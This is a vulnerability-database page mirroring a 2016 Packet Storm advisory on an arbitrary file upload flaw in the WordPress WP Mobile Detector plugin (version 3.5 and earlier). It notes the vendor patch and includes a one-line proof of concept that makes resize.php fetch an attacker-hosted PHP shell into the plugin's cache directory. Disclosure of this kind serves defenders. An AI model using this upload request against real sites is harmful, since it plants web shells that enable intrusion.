Vulners
Lucene search
WordPress WP Mobile Detector 3.5 Shell Upload
🗓️ 03 Jun 2016 00:00:00Reported by Aaditya PuraniType 
packetstorm🔗 packetstormsecurity.com👁 27 Views
`Hello,
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .Even Sucuri
has published one advisory on it.
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to [wordpress site
path].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to
your shell.php]
and it will get saved in directory
/wp-content/plugins/wp-mobile-detector/cache/shell.php
Warm Regards,
Aaditya Purani
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2016 00:00Current
7.4High risk
Vulners AI Score7.4